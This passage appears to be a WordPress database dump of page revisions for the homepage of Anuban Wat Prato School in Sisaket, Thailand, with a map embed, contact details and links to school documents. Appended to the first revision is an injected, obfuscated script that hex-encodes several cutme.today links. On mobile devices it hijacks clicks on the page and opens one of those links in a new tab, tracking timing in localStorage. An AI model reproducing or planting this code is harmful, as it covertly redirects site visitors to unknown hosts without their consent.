src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-30 10:06:41','2024-08-30 03:06:41','',19,'http://watprato.ssk.in.th/?p=293',0,'revision','',0),
(295,2,'2024-08-30 10:11:26','2024-08-30 03:11:26','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":4,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 